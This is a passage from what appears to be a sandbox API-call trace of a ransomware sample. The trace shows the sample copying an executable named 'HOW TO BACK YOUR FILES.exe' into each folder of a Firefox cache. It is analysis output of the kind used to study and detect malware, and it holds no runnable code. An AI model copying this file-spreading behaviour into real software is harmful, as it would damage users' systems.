HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" [0110.983] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" [0110.983] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.983] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.984] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.984] GetLastError () returned 0x0 [0110.984] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.984] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bad4d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bad4d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.985] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" [0110.985] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" [0110.985] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.985] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.985] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.986] GetLastError () returned 0x0 [0110.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.986] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" [0110.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" [0110.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.987] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.988] GetLastError () returned 0x0 [0110.988] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.988] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bafaea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bafaea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.988] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" [0110.988] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" [0110.988] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.988] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.989] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.989] GetLastError () returned 0x0 [0110.990] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.990] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" [0110.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" [0110.990] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.990] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.991] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.991] GetLastError () returned 0x0 [0110.991] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e671d0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6bafaea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bafaea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.992] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" [0110.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" [0110.992] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.992] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.993] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.993] GetLastError () returned 0x0 [0110.993] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d8f47a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d8f47a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" [0110.994] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" [0110.994] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.994] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.994] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.995] GetLastError () returned 0x0 [0110.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7eaf750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6bb21000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6bb21000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.995] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" [0110.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" [0110.995] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.996] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\b\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.996] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.996] GetLastError () returned 0x0 [0110.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.997] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" [0110.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" [0110.997] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.997] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\a\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.998] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.998] GetLastError () returned 0x0 [0110.998] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.999] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" [0110.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" [0110.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.000] GetLastError () returned 0x0 [0111.000] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d91a900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d91a900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 